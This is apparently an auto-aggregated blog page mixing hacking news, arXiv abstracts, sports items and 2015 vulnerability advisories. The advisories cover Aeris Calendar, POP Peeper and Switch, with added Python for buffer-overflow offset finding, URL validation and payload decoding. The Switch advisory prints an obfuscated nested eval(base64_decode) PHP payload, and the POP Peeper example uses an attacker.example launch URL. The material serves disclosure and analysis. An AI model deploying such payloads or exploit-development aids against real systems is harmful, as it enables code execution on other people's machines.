> Special Thanks : Sajjad Sotoudeh [Forum: http://ift.tt/1S89BjS]
> Friends: Mr.Moein , sheytan azzam , Mr.PERSIA , HellBoy.Blackhat, Jok3r , Kamran Helish , Dr.RooT
>
> Disclaimer & Information:
> =========================
> The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
>
> Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut
> Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
> Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x
> Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab
> Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS
> Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp
>
> Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
>
> Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Symfony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability

Title corrected Symfony CMS to Symphony CMS.

================================================================
Symphony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability
================================================================
Information

Source: Gmail -> IFTTT-> Blogger

[FD] Executable installers are vulnerable^WEVIL (case 15): F-SecureOnlineScanner.exe allows arbitrary (remote) code execution and escalation of privilege

I have a new follower on Twitter


Football Fans
World's first fan-run pro sports franchise. Fans decide everything from mascot to in-game play calls via proprietary technology. Let's do this.
Dallas
https://t.co/TVVRuzQgIx
Following: 3487 - Followers: 2210

December 23, 2015 at 09:22AM via Twitter http://twitter.com/ProFootball_Fan

Anonymous declares cyber war on Turkey

This is the melodramatic sign-off of the latest video threat from cyber activist group Anonymous, announcing that they are now aiming their unique ...

from Google Alert - anonymous http://ift.tt/1JuIBnH
via IFTTT

Anonymous declares cyber war on Turkish government websites, citing Ankara's support of Islamic ...

The Anonymous hacktivist group has taken responsibility for a powerful cyber-attack on the Turkish sector of the internet last week. It promised to ...

from Google Alert - anonymous http://ift.tt/1JuICb2
via IFTTT

130 Celebrities' Email Accounts Hacked; Hacker Stole Movie Scripts and Sex Tapes

Breaking News: A 23-year-old Bahamian man has been arrested and charged with hacking into the email accounts of 130 celebrities and stealing the unreleased movie and TV scripts, sex tapes, explicit images and even the upcoming album of a famous A-List Celebrity. The hacker named Alonzo Knowles contacted a famous radio host to sell the stolen scripts for the first six episodes of a hit


from The Hacker News http://ift.tt/1NLlQh6
via IFTTT

Kim Dotcom loses Fight Against Extradition to the US

Internet millionaire and Megaupload founder Kim Dotcom and his three associates are eligible for extradition to the US to face criminal charges over massive copyright infringement on Megaupload (now-shuttered), the court has ruled citing "overwhelming" evidence. On Tuesday afternoon, New Zealand District Court Judge Nevin Dawson told the court that the United States had presented enough


from The Hacker News http://ift.tt/1NL8am8
via IFTTT

NASA Images Show Human Fingerprint on Global Air Quality - Release Materials

Using new, high-resolution global satellite maps of air quality indicators, NASA scientists tracked air pollution trends over the last decade in various regions and 195 cities around the globe. According to recent NASA research findings, the United States, Europe and Japan have improved air quality thanks to emission control regulations, while China, India and the Middle East, with their fast-growing economies and expanding industry, have seen more air pollution. Scientists examined observations made from 2005 to 2014 by the Ozone Monitoring Instrument aboard NASA's Aura satellite. One of the atmospheric gases the instrument detects is nitrogen dioxide, a yellow-brown gas that is a common emission from cars, power plants and industrial activity. Nitrogen dioxide can quickly transform into ground-level ozone, a major respiratory pollutant in urban smog. Nitrogen dioxide hotspots, used as an indicator of general air quality, occur over most major cities in developed and developing nations. The following visualizations include two types of data. The absolute concentrations show the concentration of tropospheric nitrogen dioxide, with blue and green colors denoting lower concentrations and orange and red areas indicating higher concentrations. The second type of data is the trend data from 2005 to 2014, which shows the observed change in concentration over the ten-year period. Blue indicates an observed decrease in nitrogen dioxide, and orange indicates an observed increase. Please note that the range on the color bars (text is in white) changes from location to location in order to highlight features seen in the different geographic regions.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1Zoxm9F
via IFTTT

Tuesday, December 22, 2015

Ravens: G Marshal Yanda and P Sam Koch selected to Pro Bowl (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Addressing Complex and Subjective Product-Related Queries with Customer Reviews. (arXiv:1512.06863v1 [cs.IR])

Online reviews are often our first port of call when considering products and purchases online. When evaluating a potential purchase, we may have a specific query in mind, e.g. `will this baby seat fit in the overhead compartment of a 747?' or `will I like this album if I liked Taylor Swift's 1989?'. To answer such questions we must either wade through huge volumes of consumer reviews hoping to find one that is relevant, or otherwise pose our question directly to the community via a Q/A system.

In this paper we hope to fuse these two paradigms: given a large volume of previously answered queries about products, we hope to automatically learn whether a review of a product is relevant to a given query. We formulate this as a machine learning problem using a mixture-of-experts-type framework---here each review is an `expert' that gets to vote on the response to a particular query; simultaneously we learn a relevance function such that `relevant' reviews are those that vote correctly. At test time this learned relevance function allows us to surface reviews that are relevant to new queries on-demand. We evaluate our system, Moqa, on a novel corpus of 1.4 million questions (and answers) and 13 million reviews. We show quantitatively that it is effective at addressing both binary and open-ended queries, and qualitatively that it surfaces reviews that human evaluators consider to be relevant.

from cs.AI updates on arXiv.org http://ift.tt/1mz8de0
via IFTTT

Restricted Predicates for Hypothetical Datalog. (arXiv:1512.06945v1 [cs.DB])

Hypothetical Datalog is based on an intuitionistic semantics rather than on a classical logic semantics, and embedded implications are allowed in rule bodies. While the usual implication (i.e., the neck of a Horn clause) stands for inferring facts, an embedded implication plays the role of assuming its premise for deriving its consequence. A former work introduced both a formal framework and a goal-oriented tabled implementation, allowing negation in rule bodies. While in that work positive assumptions for both facts and rules can occur in the premise, negative assumptions are not allowed. In this work, we cover this subject by introducing a new concept: a restricted predicate, which allows negative assumptions by pruning the usual semantics of a predicate. This new setting has been implemented in the deductive system DES.

from cs.AI updates on arXiv.org http://ift.tt/1S9OZb1
via IFTTT

On the Differential Privacy of Bayesian Inference. (arXiv:1512.06992v1 [cs.AI])

We study how to communicate findings of Bayesian inference to third parties, while preserving the strong guarantee of differential privacy. Our main contributions are four different algorithms for private Bayesian inference on probabilistic graphical models. These include two mechanisms for adding noise to the Bayesian updates, either directly to the posterior parameters, or to their Fourier transform so as to preserve update consistency. We also utilise a recently introduced posterior sampling mechanism, for which we prove bounds for the specific but general case of discrete Bayesian networks; and we introduce a maximum-a-posteriori private mechanism. Our analysis includes utility and privacy bounds, with a novel focus on the influence of graph structure on privacy. Worked examples and experiments with Bayesian naïve Bayes and Bayesian linear regression illustrate the application of our mechanisms.

from cs.AI updates on arXiv.org http://ift.tt/1S9OWfw
via IFTTT

Beauty and Brains: Detecting Anomalous Pattern Co-Occurrences. (arXiv:1512.07048v1 [cs.AI])

Our world is filled with both beautiful and brainy people, but how often does a Nobel Prize winner also win a beauty pageant? Let us assume that someone who is both very beautiful and very smart is rarer than we would expect from the combination of the number of beautiful and brainy people. Of course there will still always be some individuals that defy this stereotype; these beautiful brainy people are exactly the class of anomaly we focus on in this paper. They do not possess rare qualities, but it is the unexpected combination of factors that makes them stand out.

In this paper we define the above described class of anomaly and propose a method to quickly identify them in transaction data. Further, as we take a pattern set based approach, our method readily explains why a transaction is anomalous. The effectiveness of our method is thoroughly verified with a wide range of experiments on both real world and synthetic data.

from cs.AI updates on arXiv.org http://ift.tt/1mz8bms
via IFTTT

Keeping it Short and Simple: Summarising Complex Event Sequences with Multivariate Patterns. (arXiv:1512.07056v1 [cs.AI])

We study how to obtain concise descriptions of discrete multivariate sequential data in terms of rich multivariate sequential patterns that can capture potentially highly interesting (cor)relations between sequences. To this end we allow our pattern language to span over the alphabets (domains) of all sequences, allow patterns to overlap temporally, and allow for gaps in their occurrences. We formalise our goal by the Minimum Description Length principle, by which our objective is to discover the set of patterns that provides the most succinct description of the data. To discover good pattern sets, we introduce Ditto, an efficient algorithm to approximate the ideal result. We support our claim with a set of experiments on both synthetic and real data.

from cs.AI updates on arXiv.org http://ift.tt/1TgfF8q
via IFTTT

SR-Clustering: Semantic Regularized Clustering for Egocentric Photo Streams Segmentation. (arXiv:1512.07143v1 [cs.AI])

While wearable cameras are becoming increasingly popular, locating relevant information in large unstructured collections of egocentric images is still a tedious and time-consuming process. This paper addresses the problem of organizing egocentric photo streams acquired by a wearable camera into semantically meaningful segments. First, contextual and semantic information is extracted for each image by employing a convolutional neural network approach. Later, by integrating language processing, a vocabulary of concepts is defined in a semantic space. Finally, by exploiting the temporal coherence in photo streams, images which share contextual and semantic attributes are grouped together. The resulting temporal segmentation is particularly suited for further analysis, ranging from activity and event recognition to semantic indexing and summarization. Experiments over egocentric sets of nearly 17,000 images show that the proposed approach outperforms state-of-the-art methods.

from cs.AI updates on arXiv.org http://ift.tt/1mz8cXA
via IFTTT

Heuristic algorithms for finding distribution reducts in probabilistic rough set model. (arXiv:1512.07162v1 [cs.AI])

Attribute reduction is one of the most important topics in rough set theory. Heuristic attribute reduction algorithms have been presented to solve the attribute reduction problem. It is generally known that fitness functions play a key role in developing heuristic attribute reduction algorithms. The monotonicity of fitness functions can guarantee the validity of heuristic attribute reduction algorithms. In probabilistic rough set model, distribution reducts can ensure the decision rules derived from the reducts are compatible with those derived from the original decision table. However, there are few studies on developing heuristic attribute reduction algorithms for finding distribution reducts. This is partly due to the fact that there are no monotonic fitness functions that are used to design heuristic attribute reduction algorithms in probabilistic rough set model. The main objective of this paper is to develop heuristic attribute reduction algorithms for finding distribution reducts in probabilistic rough set model. For one thing, two monotonic fitness functions are constructed, from which equivalence definitions of distribution reducts can be obtained. For another, two modified monotonic fitness functions are proposed to evaluate the significance of attributes more effectively. On this basis, two heuristic attribute reduction algorithms for finding distribution reducts are developed based on addition-deletion method and deletion method. In particular, the monotonicity of fitness functions guarantees the rationality of the proposed heuristic attribute reduction algorithms. Results of experimental analysis are included to quantify the effectiveness of the proposed fitness functions and distribution reducts.

from cs.AI updates on arXiv.org http://ift.tt/1mz8bmo
via IFTTT

Diffusion Methods for Classification with Pairwise Relationships. (arXiv:1505.06072v3 [cs.AI] UPDATED)

We define two algorithms for propagating information in classification problems with pairwise relationships. The algorithms are based on contraction maps and are related to non-linear diffusion and random walks on graphs. The approach is also related to message passing algorithms, including belief propagation and mean field methods. The algorithms we describe are guaranteed to converge on graphs with arbitrary topology. Moreover they always converge to a unique fixed point, independent of initialization. We prove that the fixed points of the algorithms under consideration define lower-bounds on the energy function and the max-marginals of a Markov random field. The theoretical results also illustrate a relationship between message passing algorithms and value iteration for an infinite horizon Markov decision process. We illustrate the practical application of the algorithms under study with numerical experiments in image restoration, stereo depth estimation and binary classification on a grid.

from cs.AI updates on arXiv.org http://ift.tt/1FOdRkA
via IFTTT

Black-Box Policy Search with Probabilistic Programs. (arXiv:1507.04635v3 [stat.ML] UPDATED)

In this work, we explore how probabilistic programs can be used to represent policies in sequential decision problems. In this formulation, a probabilistic program is a black-box stochastic simulator for both the problem domain and the agent. We relate classic policy gradient techniques to recently introduced black-box variational methods which generalize to probabilistic program inference. We present case studies in the Canadian traveler problem, Rock Sample, and a benchmark for optimal diagnosis inspired by Guess Who. Each study illustrates how programs can efficiently represent policies using moderate numbers of parameters.

from cs.AI updates on arXiv.org http://ift.tt/1gErlEI
via IFTTT

Action-Conditional Video Prediction using Deep Networks in Atari Games. (arXiv:1507.08750v2 [cs.LG] UPDATED)

Motivated by vision-based reinforcement learning (RL) problems, in particular Atari games from the recent benchmark Arcade Learning Environment (ALE), we consider spatio-temporal prediction problems where future (image-)frames are dependent on control variables or actions as well as previous frames. While not composed of natural scenes, frames in Atari games are high-dimensional in size, can involve tens of objects with one or more objects being controlled by the actions directly and many other objects being influenced indirectly, can involve entry and departure of objects, and can involve deep partial observability. We propose and evaluate two deep neural network architectures that consist of encoding, action-conditional transformation, and decoding layers based on convolutional neural networks and recurrent neural networks. Experimental results show that the proposed architectures are able to generate visually-realistic frames that are also useful for control over approximately 100-step action-conditional futures in some games. To the best of our knowledge, this paper is the first to make and evaluate long-term predictions on high-dimensional video conditioned by control inputs.

from cs.AI updates on arXiv.org http://ift.tt/1eMm3Wb
via IFTTT

Ocean City, MD's surf is at least 5.42ft high

Maryland-Delaware, December 28, 2015 at 02:00PM

Ocean City, MD Summary
At 2:00 AM, surf min of 3.08ft. At 8:00 AM, surf min of 4.72ft. At 2:00 PM, surf min of 5.42ft. At 8:00 PM, surf min of 4.12ft.

Surf maximum: 6.43ft (1.96m)
Surf minimum: 5.42ft (1.65m)
Tide height: 0.55ft (0.17m)
Wind direction: ESE
Wind speed: 22.12 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Ravens: Despite a loss, Baltimore (4-10) inches up a spot to 28th in Week 16 NFL Power Rankings; open for full rankings (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Orioles Buzz: Baltimore reportedly keeping eye on free agent SP Mat Latos; 64-55, 3.51 ERA in 7-year career (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Encrypted Email Servers Seized by German Authorities After School Bomb Threats

In the wake of a hoax bomb threat, all public schools in Los Angeles were closed for a day last week, and now German authorities have seized an encrypted email server. But does that make sense? In a video statement posted on Monday, the administrator of Cock.li – an anonymous email provider service – said German authorities had seized a hard drive from one of its servers that used to


from The Hacker News http://ift.tt/1YuPqBT
via IFTTT

[FD] SIPROTEC 4 and SIPROTEC Compact FAQ #5

"SIPROTEC 4 and SIPROTEC Compact devices allow the display of extended internal statistics and test information... To access this information, the confirmation code ... needs to be provided when prompted." Good to know... http://ift.tt/1InQC2S

Source: Gmail -> IFTTT-> Blogger

I have a new follower on Twitter


Cyber Security News
#cybersecurity, #infosec, #hacking stories.


Following: 427 - Followers: 288

December 22, 2015 at 01:25PM via Twitter http://twitter.com/CyberSec__News

Alcoholics Anonymous

Jack Alexander introduced Alcoholics Anonymous to a national stage when this article was published on March 1, 1941.

from Google Alert - anonymous http://ift.tt/22nZyvC
via IFTTT

I have a new follower on Twitter


SiteSell Inc.
Helping entrepreneurs take whatever their passions are and move them from ideas to income. Social, marketing, web design, blogging. Lovers of freedom.

http://t.co/EhxyAU8jme
Following: 2873 - Followers: 14331

December 22, 2015 at 11:11AM via Twitter http://twitter.com/SiteSell

[FD] Aeris Calendar v2.1 - Buffer Overflow Vulnerability

Document Title:
===============
Aeris Calendar v2.1 - Buffer Overflow Vulnerability

References (Source):
====================
http://ift.tt/1MtMuJr

Release Date:
=============
2015-12-01

Vulnerability Laboratory ID (VL-ID):
====================================
1656

Common Vulnerability Scoring System:
====================================
6.4

Product & Service Introduction:
===============================
Aeris Calendar is a full-featured desktop calendar with current weather conditions, forecasts and severe weather alerts. Aeris Calendar allows you to add reminders, notes, to-dos and special events like birthdays and anniversaries. The extended forecast is displayed directly on the calendar and current conditions are displayed on the calendar, tray icon and desklet. Themes allow you to skin the calendar, or you can select any image on your computer to serve as the backdrop for your calendar.

(Copy of the Vendor Homepage: http://ift.tt/1V2sa8W )

Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory researcher discovered a local buffer overflow vulnerability in the official Aeris Calendar v2.1 software.

Vulnerability Disclosure Timeline:
==================================
2015-12-01: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Esumsoft
Product: Aeris Calendar - Software 2.1

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

Technical Details & Description:
================================
A local Unicode buffer overflow has been discovered in the official Aeris Calendar v2.1 software. The overflow lets an attacker overwrite saved registers of the software process (EIP, EBP and ECX among others) and so control the address of the next instruction the process executes.

The vulnerable input is the location search field under Weather -> Set Location. A sufficiently long Unicode string pasted into this field overruns the buffer and overwrites the saved EIP, after which the attacker can redirect execution into a payload of their choice in the context of the running process.

The security risk of the buffer overflow vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 6.4. The advisory classifies the issue as local, requiring a low-privileged system user account and no further user interaction. Note for readers: the proof of concept supplies the overlong string through the program's own GUI, so the trigger is pasted by the user who runs the program, and what the advisory demonstrates is a crash with attacker-controlled register values, not the crossing of a privilege boundary. The impact shown is therefore code execution with the privileges of the user running Aeris Calendar.

Vulnerable Module(s):
[+] Weather -> Set Location > Input <> [Search]

Proof of Concept (PoC):
=======================
The buffer overflow vulnerability can be exploited by local attackers with a restricted system user account (the advisory rates it as needing no further user interaction; see the note above). For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Launch Aeris Calendar.exe
2. Click Weather -> Set Location
3. Copy the AAAA...+ string from bof.txt to the clipboard
4. Paste it into the input "Enter your city or zip code" and click Search
5. The software crashes with a BEX exception (the Windows Error Reporting event name for a buffer-overrun fault, raised when DEP or a stack cookie check stops the corrupted process)
6. Successful reproduction of the local buffer overflow vulnerability!
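Added example (not part of the advisory, and not the author's bof.txt): the following Python builds the long input as a cyclic pattern instead of "AAAA...", so that the value left in EIP, EBP or ECX after the crash can be mapped back to an offset inside the input. It covers the Unicode case the advisory describes, where each character lands on the stack as "XX 00" and a register therefore exposes only two pattern characters. The function names, the pattern length and the register values below are this example's own; the advisory reports no offsets or addresses.

```python
import string
import struct


def cyclic_pattern(length: int) -> str:
    """Non-repeating pattern of 'Aa0Aa1...Zz9' triplets (the scheme used by
    pattern_create.rb); every 3-character window is unique for the first
    20280 characters, so a register value can be mapped back to one offset."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def offset_of_ansi(pattern: str, reg: int) -> int:
    """Offset of a 32-bit little-endian register value for an overflow where
    the input reached the stack byte-for-byte (ANSI). Returns -1 if not found."""
    needle = struct.pack("<I", reg).decode("latin-1")
    return pattern.find(needle)


def offsets_of_unicode(pattern: str, reg: int) -> list:
    """Offsets for the Unicode case the advisory describes: the input is stored
    as UTF-16LE, so each character becomes 'XX 00' and a register holds only two
    pattern characters, e.g. 0x00610041 for 'Aa'. Two characters do not pin down
    a unique position, so every candidate offset is returned and the caller
    disambiguates with a second register (EBP, ECX) or a shifted pattern."""
    raw = struct.pack("<I", reg)
    if raw[1] != 0 or raw[3] != 0:
        return []  # not of the form 'char 00 char 00': not a Unicode overwrite
    needle = chr(raw[0]) + chr(raw[2])
    hits, start = [], 0
    while True:
        i = pattern.find(needle, start)
        if i == -1:
            return hits
        hits.append(i)
        start = i + 1


def write_bof_txt(path: str, length: int) -> str:
    """Write the pattern to the file the advisory calls bof.txt (assumed name)
    and return it, so the same string is used for pasting and for offset lookup."""
    pattern = cyclic_pattern(length)
    with open(path, "w", encoding="ascii", newline="") as fh:
        fh.write(pattern)
    return pattern


if __name__ == "__main__":
    # Constructed check values: the offsets below come from this pattern,
    # not from the advisory, which reports none.
    pat = cyclic_pattern(5000)
    print("ANSI offset for 0x61413161 ('a1Aa'):", offset_of_ansi(pat, 0x61413161))
    print("Unicode candidates for 0x00610041 ('Aa'):", offsets_of_unicode(pat, 0x00610041)[:5])
```

Paste the string written by write_bof_txt into the Set Location field as in steps 3 and 4, read the faulting register values from the debugger or the WER report, and feed them to the two lookup functions. A Unicode overwrite only ever exposes two pattern characters per register, so expect several candidates and narrow them down with a second register or a second run with a shifted pattern.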

Source: Gmail -> IFTTT-> Blogger

[FD] POP Peeper 4.0.1 - Persistent Code Execution Vulnerability

Document Title:
===============
POP Peeper 4.0.1 - Persistent Code Execution Vulnerability

References (Source):
====================
http://ift.tt/1U2nTB1

Release Date:
=============
2015-11-26

Vulnerability Laboratory ID (VL-ID):
====================================
1657

Common Vulnerability Scoring System:
====================================
5.7

Product & Service Introduction:
===============================
POP Peeper is an email notifier that runs in the Windows task bar and alerts you when you have new email on any of your accounts: POP3, IMAP (with IDLE support), Hotmail-MSN-LiveMail, Yahoo, GMail, MyWay, Excite, iWon, Lycos.com, RediffMail, Juno and NetZero. IMAP support also allows you to access AOL, AIM, Netscape and other services. Send mail directly from POP Peeper and use the address book to email your frequently used contacts. POP Peeper allows you to view messages using HTML, or you can choose to safely view all messages in rich or plain text. Several options are available that will decrease or eliminate the risks of reading your email (viruses, JavaScript, web bugs, etc.). POP Peeper can be run from a portable device and can be password protected. Many notification options are available to indicate when new mail has arrived, such as sound alerts (configurable for each account), flashing scroll lock, skinnable popup notifier, customized screensaver and more.

(Copy of the Vendor Homepage: http://ift.tt/1QVPDbk )

Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory researcher discovered a code execution vulnerability in the official POP Peeper v4.0.1 software.

Vulnerability Disclosure Timeline:
==================================
2015-11-23: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Esumsoft
Product: POP Peeper - Software 4.0.1

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Technical Details & Description:
================================
A code execution vulnerability has been discovered in the official POP Peeper v4.0.1 software. The "Email Client" setting under Tools -> Options -> General is meant to hold the path of the program to launch when the user composes mail. POP Peeper stores whatever string is entered there without checking that it is a local executable, and the value persists in the saved configuration (hence "persistent"). When Compose is clicked, the stored value is launched as-is, so a remote URL entered in that field makes the program fetch and open a resource from an attacker-controlled site. I created a video that demonstrates how to download software from a website created by the attacker.

Note for readers: in the steps below the malicious value is entered by the same local user who then clicks Compose, and the advisory does not show the setting being written by anyone else, so the proof of concept demonstrates the unvalidated launching of a configured target rather than the crossing of a privilege boundary.

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by local attackers with a low-privileged system user account. For security demonstration or to reproduce the issue follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Launch POP Peeper.exe
2. Click Tools -> Options -> General
3. Paste the malicious URL into the input "Email Client"
4. Click OK and then click Compose
5. The stored URL is launched and the attacker's page (a PHP page in the author's demonstration) is loaded: code execution as shown in the video

PoC Exploit:
Video Demonstration: http://ift.tt/1ZnhWCw

Security Risk:
==============
The security risk of the code execution vulnerability in the POP Peeper 4.0.1 software is estimated as medium. (CVSS 5.7)

Credits & Authors:
==================
ZwX - (http://zwx.fr) [ http://ift.tt/1OEBOwM ]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as is without any warranty.
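Added example (not code from POP Peeper or its vendor): the contrast between launching the stored "Email Client" value as-is, which is the behaviour the advisory describes, and validating it as an absolute path to an existing local .exe, both when the preference is saved and again at Compose time, since a persisted value can change between the two. The function names, the exception type and the sample values are this example's own, and the exists parameter is injectable only so the check can run without a real filesystem.

```python
import ntpath
from urllib.parse import urlsplit

ALLOWED_EXTENSIONS = {".exe"}


class UnsafeClientPath(ValueError):
    """Raised when the stored "Email Client" value must not be launched."""


def is_url(value: str) -> bool:
    scheme = urlsplit(value).scheme
    return len(scheme) > 1  # a one-letter scheme is a drive letter (C:\...), not a URL


def plan_launch_unchecked(value: str) -> tuple:
    """The pattern the advisory describes: whatever string was saved in the
    preference is handed to the OS launcher (os.startfile on Windows), which
    opens a URL in the browser as readily as it starts a local program.
    Returns what would be launched instead of launching it."""
    return ("url" if is_url(value) else "file"), value


def validate_client_path(value: str, exists=ntpath.exists) -> str:
    """Accept only an absolute path to an existing local .exe."""
    v = value.strip().strip('"')
    if not v or any(c in v for c in "\r\n\x00"):
        raise UnsafeClientPath("empty or contains control characters")
    if is_url(v):
        raise UnsafeClientPath("URL schemes are not allowed: %s" % v)
    if v.startswith(("\\\\", "//")):
        raise UnsafeClientPath("UNC paths fetch from the network: %s" % v)
    if not ntpath.isabs(v):
        raise UnsafeClientPath("path must be absolute: %s" % v)
    if ntpath.splitext(v)[1].lower() not in ALLOWED_EXTENSIONS:
        raise UnsafeClientPath("not an executable file: %s" % v)
    if not exists(v):
        raise UnsafeClientPath("no such file: %s" % v)
    return v


def is_safe_client_path(value: str, exists=ntpath.exists) -> bool:
    try:
        validate_client_path(value, exists)
        return True
    except UnsafeClientPath:
        return False


def compose_command(value: str, mailto: str, exists=ntpath.exists) -> list:
    """Hardened launcher: re-validate at launch time (the saved value may have
    changed since it was entered) and build an argument vector with no shell,
    so the recipient string cannot add flags or a second command."""
    exe = validate_client_path(value, exists)
    if not mailto.lower().startswith("mailto:"):
        raise ValueError("compose target must be a mailto: URI")
    return [exe, mailto]


if __name__ == "__main__":
    # Constructed values, not taken from the advisory.
    print(plan_launch_unchecked("http://attacker.example/client.php"))
    print(is_safe_client_path("http://attacker.example/client.php"))
    print(is_safe_client_path(r"C:\Program Files\Mail\client.exe", exists=lambda p: True))
```

The two checks that matter most are the ones a path-only validator tends to miss: a scheme longer than one character (http, file, javascript) and a UNC prefix, both of which turn a "local program" setting into a network fetch. Running the validator a second time at launch is what closes the persistent half of the issue.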

Source: Gmail -> IFTTT-> Blogger

[FD] Switch v4.68 - Code Execution Vulnerability

Document Title:
===============
Switch v4.68 - Code Execution Vulnerability

References (Source):
====================
http://ift.tt/1NngqxO

Release Date:
=============
2015-11-23

Vulnerability Laboratory ID (VL-ID):
====================================
1649

Common Vulnerability Scoring System:
====================================
8.2

Product & Service Introduction:
===============================
http://ift.tt/1YuiU2N

Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory researcher discovered a code execution vulnerability in the official Switch v4.68 software.

Vulnerability Disclosure Timeline:
==================================
2015-11-23: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
NCH Software
Product: Switch 4.68

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

Technical Details & Description:
================================
A local code execution vulnerability has been discovered in the official Switch v4.68 software. The bug allows a local attacker to execute malicious code through a vulnerable input field: the `url` field of the Convert module, which takes the address of an audio stream to convert, is passed on without validation, so a local attacker can inject a payload as the stream URL to compromise the software process. The issue exists because the URL input is not validated before use.

The security risk of the code execution vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 8.2. Exploitation requires a low-privileged system user account; the advisory states that no further user interaction is needed, although the steps below are carried out in the program's own GUI by the user entering the URL.

Note for readers: the proof of concept payload is PHP. Its three nested eval(base64_decode(...)) layers unwrap to exec('C:\WINDOWS\system32\calc.exe'); which is what the "Calculator" label refers to. PHP exec() only runs where a PHP interpreter evaluates the string; Switch does not embed one as far as the advisory shows, and the advisory does not name the component that evaluated the payload when the stream was started, so reproduce the reported impact before relying on it.

Vulnerable Module(s):
[+] Convert

Vulnerable Input(s):
[+] url

Affected Module(s):
[+] Audio Stream

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by local attackers with a low-privileged system user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Launch Switch.exe
2. Click Convert > Convert the audio data stream
3. Paste the malicious URL into the input `Enter url of the audio stream`
4. Click to start the audio stream
5. PHP code executed successfully!

PoC: Code Execution Calculator
eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ2RhV0doc1dYbG5ibEY2Y0dOV01HeFBVa1U1V0ZVeGVIcGxXRTR3V2xjd2VrMXNlR3BaVjNocVRHMVdORnBUWTNCUGR6MDlKeWtwT3c9PScpKTs=')); ?>

Security Risk:
==============
The security risk of the code execution vulnerability in the Convert module of the Switch software is estimated as high. (CVSS 8.2)

Credits & Authors:
==================
ZwX - (http://zwx.fr) [ http://ift.tt/1OEBOwM ]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as is without any warranty.
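Added example (not part of the advisory): a small Python decoder that peels the nested eval(base64_decode(...)) layers of a PoC like the one above, so an analyst can see what a payload does before judging whether the reported impact is plausible. POC_FROM_ADVISORY is the advisory's string copied as printed, including the line-wrap space inside the base64; it unwraps through three layers to exec('C:\WINDOWS\system32\calc.exe');. SAMPLE is a constructed second input built by wrap(). The function names and the depth limit are this example's own.

```python
import base64
import binascii
import re

# One eval(base64_decode('...')) layer, optionally inside <?php ... ?> tags.
# The base64 group admits whitespace because such payloads are often line-wrapped.
WRAPPER = re.compile(
    r"^\s*(?:<\?php\s*)?eval\s*\(\s*base64_decode\s*\(\s*['\"]"
    r"([A-Za-z0-9+/=\s]+)"
    r"['\"]\s*\)\s*\)\s*;?\s*(?:\?>)?\s*$"
)


def unwrap_eval_layers(payload: str, max_depth: int = 16) -> tuple:
    """Peel nested eval(base64_decode(...)) layers; return (innermost_code, depth).
    Stops when the text no longer matches the wrapper, when the base64 is invalid,
    when the decoded bytes are not UTF-8 text, or at max_depth (a payload can be
    nested arbitrarily deep to make a naive decoder spin)."""
    current, depth = payload, 0
    while depth < max_depth:
        m = WRAPPER.match(current)
        if not m:
            break
        b64 = re.sub(r"\s+", "", m.group(1))
        try:
            current = base64.b64decode(b64, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            break
        depth += 1
    return current, depth


def wrap(code: str, layers: int) -> str:
    """Build a nested wrapper of the same shape (used here to construct a sample)."""
    for _ in range(layers):
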